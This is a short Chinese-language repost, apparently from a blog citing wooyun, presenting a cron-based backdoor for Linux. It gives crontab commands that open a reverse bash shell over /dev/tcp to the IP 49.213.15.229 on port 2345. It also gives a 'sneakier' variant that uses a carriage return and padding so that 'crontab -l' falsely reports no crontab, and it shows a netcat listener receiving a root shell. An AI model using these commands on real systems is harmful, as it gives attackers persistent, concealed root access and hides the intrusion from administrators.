最好用一个不常见的用户执行,任务写入/var/spool/cron/$username
(crontab -l;echo ‘*/60 * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash –noprofile -i’)|crontab –
升级猥琐版
(crontab -l;printf “* * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash –noprofile -i;\rno crontab for `whoami`%100c\n”)|crontab –
crontab -l 直接提示no crontab for $username
[root@vincenthostname bin]# crontab -l
no crontab for root
反弹成功
[vincent@iZ62luqzx5xZ src]$ ./netcat -l -p 2345
bash: no job control in this shell
[root@vincenthostname ~]# whoami
whoami
root
转自:https://zone.wooyun.org/content/18244
评论
热度(2)